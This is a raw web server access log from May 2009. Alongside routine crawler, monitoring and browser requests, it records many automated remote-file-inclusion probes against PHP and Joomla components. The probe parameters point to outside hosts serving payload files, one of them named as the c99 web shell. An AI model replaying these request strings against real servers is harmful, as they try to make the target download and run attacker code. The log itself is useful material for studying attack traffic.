66.249.67.16 - - [30/May/2009:07:01:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102121498F111700654E06Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.17.99.13 - - [30/May/2009:07:01:02 -0400] "GET //setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:01:02 -0400] "GET /logs//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:01:02 -0400] "GET /logs/access_log.Q109051500//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:01:13 -0400] "GET /logs/access_log.Q109052100//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
71.254.105.60 - - [30/May/2009:07:01:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [30/May/2009:07:01:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [30/May/2009:07:01:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [30/May/2009:07:01:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
209.59.12.99 - - [30/May/2009:07:01:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.73.56.159 - - [30/May/2009:07:01:56 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:01:56 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:01:56 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:07:02:06 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:02:21 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:02:21 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:02:21 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
220.181.7.97 - - [30/May/2009:07:02:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.17.162.28 - - [30/May/2009:07:02:29 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:02:32 -0400] "GET /logs/access_log.Q109051500%20%20//setup.php?%20dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:07:02:35 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.125.64.38 - - [30/May/2009:07:02:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
76.73.56.159 - - [30/May/2009:07:02:56 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:02:56 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:02:56 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:03:11 -0400] "GET /logs/access_log.Q108121900%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:07:03:14 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:07:03:15 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:07:03:45 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:07:03:47 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
85.17.162.28 - - [30/May/2009:07:03:48 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:07:03:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102121498FA157006D4E06Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.254.105.60 - - [30/May/2009:07:04:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
85.18.117.101 - - [30/May/2009:07:04:26 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:07:04:48 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
71.254.105.60 - - [30/May/2009:07:05:01 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [30/May/2009:07:05:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [30/May/2009:07:05:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [30/May/2009:07:05:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
69.94.125.100 - - [30/May/2009:07:05:18 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:18 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:18 -0400] "GET /logs/access_log.Q108112300%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:28 -0400] "GET /logs/access_log.Q108112300%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:28 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:28 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:05:29 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:05:29 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:41 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.94.125.100 - - [30/May/2009:07:05:52 -0400] "GET /logs/access_log.Q109052300%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [30/May/2009:07:05:56 -0400] "GET /logs/error_log.Q108112700//index2.php?page=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
222.236.47.188 - - [30/May/2009:07:05:56 -0400] "GET //index2.php?page=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.65"
85.17.162.28 - - [30/May/2009:07:05:57 -0400] "GET /logs/access_log.Q109050700%20%20//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:05:57 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.47.188 - - [30/May/2009:07:05:57 -0400] "GET /logs//index2.php?page=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.65"
59.24.49.35 - - [30/May/2009:07:05:57 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
78.31.141.129 - - [30/May/2009:07:06:18 -0400] "GET /logs/error_log.Q108120300//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
78.31.141.129 - - [30/May/2009:07:06:19 -0400] "GET /logs/error_log.Q108120300//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
91.121.167.8 - - [30/May/2009:07:06:21 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.812"
91.121.167.8 - - [30/May/2009:07:06:21 -0400] "GET /logs/access_log.Q109052200/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812"
91.121.167.8 - - [30/May/2009:07:06:21 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.812"
76.73.56.159 - - [30/May/2009:07:06:24 -0400] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:06:24 -0400] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:06:24 -0400] "GET /logs/access_log.Q108121900%20%20/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:07:06:27 -0400] "GET /logs/access_log.Q109050700%20%20//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.167.8 - - [30/May/2009:07:06:33 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chat95.net/Private%20Space/Hack/BOTS%20SCAN%20RFI%20LFI%20SQL/file-bots/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812"
209.59.12.99 - - [30/May/2009:07:06:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.16 - - [30/May/2009:07:06:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102121498E7197006A4E06Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [30/May/2009:07:06:55 -0400] "GET /logs/access_log.Q109050700%20%20//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:06:57 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:06:57 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:06:58 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:06:58 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:06:58 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:06:58 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:07:06:59 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:07:06:59 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.212.165.114 - - [30/May/2009:07:06:59 -0400] "GET //skin/zero_vote/error.php?dir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:04 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:04 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:04 -0400] "GET /logs/access_log.Q108081500%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:06 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:06 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:06 -0400] "GET /logs/access_log.Q108081500%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:07:07:20 -0400] "GET /logs/error_log.Q108062800//admin/classes/TPlLoad.php?full_path_to_public_program=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:07:07:20 -0400] "GET /logs//admin/classes/TPlLoad.php?full_path_to_public_program=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
76.73.56.159 - - [30/May/2009:07:07:20 -0400] "GET /logs/access_log.Q109021500%20%20/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:07:07:22 -0400] "GET //admin/classes/TPlLoad.php?full_path_to_public_program=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
121.165.73.157 - - [30/May/2009:07:07:26 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:07:28 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:07:29 -0400] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:07:29 -0400] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:07:29 -0400] "GET /logs/access_log.Q108112300%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:57 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:57 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:57 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:59 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:59 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:59 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:59 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:59 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:07:59 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:00 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:00 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:00 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.109.233.157 - - [30/May/2009:07:08:02 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
68.109.233.157 - - [30/May/2009:07:08:02 -0400] "GET //skin/zero_vote/error.php?dir=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
68.109.233.157 - - [30/May/2009:07:08:02 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
89.223.3.98 - - [30/May/2009:07:08:03 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:03 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:03 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:04 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:04 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:04 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:08:05 -0400] "GET /main.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:08:05 -0400] "GET /logs/main.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:05 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:05 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:05 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:05 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:05 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:05 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:13 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:14 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:07:08:16 -0400] "GET /logs/access_log.Q109010700%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:17 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:07:08:18 -0400] "GET /logs